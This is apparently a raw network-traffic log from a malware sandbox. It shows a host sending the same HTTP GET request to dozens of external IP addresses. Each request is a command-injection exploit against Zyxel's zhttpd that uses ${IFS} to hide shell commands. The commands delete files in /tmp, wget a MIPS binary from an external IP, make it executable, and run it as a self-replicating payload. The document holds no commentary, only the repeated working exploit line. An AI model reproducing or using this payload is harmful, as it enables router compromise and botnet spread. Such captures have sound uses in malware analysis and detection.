                                                            Jan 28, 2024 10:11:59.394799948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            119192.168.2.1333884190.57.171.173443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:59.394850969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            120192.168.2.1347804146.92.147.246443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:59.394876957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            121192.168.2.134514472.13.221.202443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:59.394990921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            122192.168.2.134144287.8.74.31443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:59.395133972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            123192.168.2.1334330119.142.84.125443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:59.395174980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            124192.168.2.1337632198.21.251.79443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:59.395282030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            125192.168.2.135986425.41.20.153443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:59.395318031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            126192.168.2.134944820.135.108.36443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:00.414169073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            127192.168.2.1360728208.67.38.187443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:00.414211035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            128192.168.2.134938891.205.101.201443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:00.414263010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            129192.168.2.1346960153.196.0.97443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:00.414299011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            130192.168.2.1356798189.228.241.85443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:00.414386034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            131192.168.2.13361669.46.19.144443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:00.414508104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            132192.168.2.13356021.103.246.211443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.417912960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            133192.168.2.135143449.119.168.187443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.417953014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            134192.168.2.1348822211.43.203.33443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.417992115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            135192.168.2.1344336103.233.154.27443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418004990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            136192.168.2.1356694170.49.34.209443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418030024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            137192.168.2.135421442.10.213.21443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418055058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            138192.168.2.1346882151.239.154.157443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418093920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            139192.168.2.135350296.226.69.57443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418142080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            140192.168.2.1337466202.184.174.34443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418164968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            141192.168.2.1356016192.46.2.166443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418201923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            142192.168.2.1344566118.119.149.83443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418201923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            143192.168.2.1346144138.109.78.214443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418252945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            144192.168.2.135619214.4.166.242443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418287039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            145192.168.2.1335130117.173.116.19443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418314934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            146192.168.2.134327613.53.89.23443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418370008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            147192.168.2.1336596216.130.198.192443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418374062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            148192.168.2.1334006158.135.154.55443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418389082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            149192.168.2.1348466160.50.84.231443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418422937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            150192.168.2.1354252113.121.191.123443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418452978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            151192.168.2.1346528189.165.26.156443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418494940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            152192.168.2.135911095.88.185.30443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418539047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            153192.168.2.1336490156.62.163.138443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418598890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            154192.168.2.1342906163.42.233.152443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418606997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            155192.168.2.135411089.117.222.47443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418661118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            156192.168.2.135368059.87.42.9443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418675900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            157192.168.2.1336162133.146.67.27443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.418724060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            158192.168.2.1344470109.4.184.60443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.419007063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            159192.168.2.1347734219.55.35.120443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.419075012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            160192.168.2.1354208118.103.217.246443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:01.419121027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            161192.168.2.1350790117.193.196.18443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.422455072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            162192.168.2.1345174172.91.94.143443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.422492981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            163192.168.2.1356270166.160.47.186443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.422528028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            164192.168.2.1340968176.36.117.90443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.422569990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            165192.168.2.1356284177.98.109.112443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.422593117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            166192.168.2.1343646208.131.1.97443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.422593117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            167192.168.2.135062471.238.32.146443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.422668934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            168192.168.2.134161894.39.81.139443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.422677040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            169192.168.2.134141066.200.62.64443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.422697067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            170192.168.2.1348794173.123.142.158443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.422749043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            171192.168.2.1349120207.207.78.8443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.422749996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            172192.168.2.13380922.184.185.66443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.422774076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            173192.168.2.134362454.182.151.237443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.422811985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            174192.168.2.135940067.67.168.108443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.422977924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            175192.168.2.1333696166.68.55.222443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.423010111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            176192.168.2.1355654123.139.6.57443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.423077106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            177192.168.2.1341518206.14.34.24443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:02.423105955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            178192.168.2.1350622217.97.123.55443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:03.427515984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            179192.168.2.1337618166.56.125.163443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:03.427580118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


